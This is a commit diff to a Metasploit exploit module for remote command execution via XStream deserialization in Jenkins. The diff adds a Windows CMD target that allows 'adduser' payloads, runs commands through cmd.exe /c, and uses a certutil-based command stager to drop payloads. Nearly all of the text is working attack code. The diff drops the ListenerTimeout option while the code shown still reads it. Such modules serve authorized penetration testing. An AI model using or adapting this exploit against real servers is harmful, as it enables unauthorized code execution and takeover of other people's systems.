Add ARCH_CMD and general fixup

2018-02-26 16:59:36 -05:00 · 2018-02-26 16:59:36 -05:00 · 2939695991
parent 1c156c3d3c
commit 2939695991
1 changed files with 18 additions and 7 deletions
--- a/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
+++ b/modules/exploits/multi/http/jenkins_xstream_deserialize.rb
@ -47,6 +47,16 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
        ],
+        ['Windows (CMD)',
+          'Platform'   => 'win',
+          'Arch'       => [ARCH_CMD],
+          'Payload' => {
+            'Compat'     => {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'adduser, generic'
+            }
+          }
+        ],
        ['Linux (Dropper)',
          'Platform'   => 'linux',
          'Arch'       => [ARCH_X86, ARCH_X64]
@ -62,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
    register_options([
      OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
      OptString.new('PSH_PATH', [false, 'Path to powershell.exe', '']),
-      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for connect back", 30]),
      Opt::RPORT('8080')
    ])
    deregister_options('URIPATH')
@ -88,22 +97,25 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    case target.name
-    when /Unix/, /Python/, /PowerShell/
+    when /Unix/, /Python/, /CMD/
      execute_command(payload.encoded)
+    when /PowerShell/
+      execute_command(payload.encoded)
+      wait_for_session
    else
-      execute_cmdstager
+      execute_cmdstager({:flavor => :certutil})
+      wait_for_session
    end
  end

  # Exploit methods
-
  def execute_command(cmd, opts = {})
    cmd = case target.name
    when /Unix/, /Linux/
      %W{/bin/sh -c #{cmd}}
    when /Python/
      %W{python -c #{cmd}}
-    when /Windows/
+    when /Windows/, /CMD/
      %W{cmd.exe /c #{cmd}}
    when /PowerShell/
      psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
@ -120,10 +132,9 @@ class MetasploitModule < Msf::Exploit::Remote
      'ctype'    => 'application/xml',
      'data'     => xstream_payload(cmd)
    )
-    wait_for_powershell_session
  end

-  def wait_for_powershell_session
+  def wait_for_session
    print_status "Waiting for exploit to complete..."
    begin
      Timeout.timeout(datastore['ListenerTimeout']) do